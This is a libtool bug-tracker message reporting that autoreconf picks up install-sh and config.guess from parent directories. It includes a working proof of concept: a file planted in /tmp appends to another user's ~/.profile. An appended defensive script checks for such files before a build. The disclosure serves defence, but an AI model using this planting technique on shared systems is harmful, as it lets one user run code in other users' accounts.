bug#21951: [security] libtoolize behavior depends on parent directories
From: Vincent Lefevre
Subject: bug#21951: [security] libtoolize behavior depends on parent directories
Date: Sat, 6 Aug 2016 19:09:45 +0200
User-agent: Mutt/1.6.2-6749-vl-r90618 (2016-08-02)

Could this bug be eventually fixed?

One can compromise other users' accounts for those who run things
from /tmp subdirectories, e.g.

User1:

  echo "echo Hacked >> ~/.profile" > /tmp/install-sh
  chmod 755 /tmp/install-sh
  cp /tmp/install-sh /tmp/config.guess

User2:

  * Have some libtool-based source in /tmp/some_dir
  * From this directory, run:

      autoreconf -i
      ./configure

The consequence is that User2 has "Hacked" written at the end of
his .profile file. Of course, one can do much worse...

--
Vincent Lefèvre <address@hidden> - Web: <https://www.vinc17.net/>
100% accessible validated (X)HTML - Blog: <https://www.vinc17.net/blog/>
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)
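
A pre-flight check for the situation reported above, as an added example that is not part of the original message or of libtool: it lists files named install-sh or config.guess (the two names used in the report) found in any ancestor of a source directory, so they can be inspected before running autoreconf and ./configure. Walking every ancestor up to / is an assumption and may be broader than what the tools actually search; the function name find_parent_aux and the AUX_NAMES variable are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original message or from libtool).
# AUX_NAMES defaults to the two file names used in the report; the
# variable and the function name are hypothetical.
AUX_NAMES="${AUX_NAMES:-install-sh config.guess}"

# find_parent_aux DIR
#   Prints an `ls -ld` line (owner, mode, path) for every AUX_NAMES file
#   that exists in a strict ancestor of DIR.
#   Returns 0 if none was found, 1 if at least one was found,
#   2 if DIR cannot be entered.
find_parent_aux() {
    # Resolve symlinks so the walk follows the real directory chain.
    dir=$(cd -- "$1" >/dev/null 2>&1 && pwd -P) || return 2
    found=0
    while [ "$dir" != "/" ]; do
        dir=$(dirname "$dir")
        for name in $AUX_NAMES; do
            # -L also catches dangling symlinks, which -e would miss.
            if [ -e "$dir/$name" ] || [ -L "$dir/$name" ]; then
                ls -ld -- "$dir/$name"
                found=1
            fi
        done
    done
    return $found
}

# Typical use, from the top of the source tree:
#   find_parent_aux . || echo "auxiliary files found in parent directories" >&2
```

Any line printed for a file owned by another user, or sitting in a world-writable directory such as /tmp, is a reason to move the source tree before building.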